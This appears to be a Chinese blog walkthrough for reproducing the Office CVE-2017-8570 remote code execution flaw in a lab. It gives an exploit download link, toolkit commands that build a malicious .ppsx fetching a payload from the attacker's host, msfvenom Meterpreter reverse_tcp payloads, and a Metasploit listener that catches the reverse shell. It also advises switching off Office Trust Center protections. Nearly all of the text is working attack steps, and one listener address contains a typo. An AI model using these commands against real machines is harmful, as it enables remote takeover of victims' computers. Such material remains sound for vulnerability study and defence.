Office CVE-2017-8570远程代码执行漏洞

攻击机:192.168.0.109,kali

靶机:192.168.0.120 ,win7,office 2010

exp: https://xycsec.cn/wp-content/uploads/2017/09/Office8570-master.zip

把exp拷贝进kali,并解压,在解压目录新建template文件夹,并把template拷贝进去

可以自己建一个ppt文档保存为template.ppsx文件。好多时候这个漏洞复现不成功,可以将查看 文件 -> 选项,点击 信任中心设置,去掉设置中的所有勾取选项即可:

一、生成恶意ppsx文件

不要打开网站服务(不要开80端口),可以不存在logo.doc文件

python cve-2017-8570_toolkit.py -M gen -w 123.ppsx -u http://192.168.0.109/logo.doc

二、生成反弹shell的exp文件

还在解压目录执行

32位执行:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=6666 -f exe > shell.exe

64位执行如下命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=6666 -f exe > shell.exe

三、监听来自ppsx会话执行反弹shell

python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.109 shell.exe -l shell.exe

另开一个msf窗口执行监听

~ msfconsole
msf > use exploit/multi/handler
msf > set LHOST 92.168.0.109
msf > set LPORT 6666
msf > set PAYLOAD windows/meterpreter/reverse_tcp  
如果是64位则为:set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

四、在靶机上运行123.ppsx文件,成功反弹shell

发表评论

电子邮件地址不会被公开。 必填项已用*标注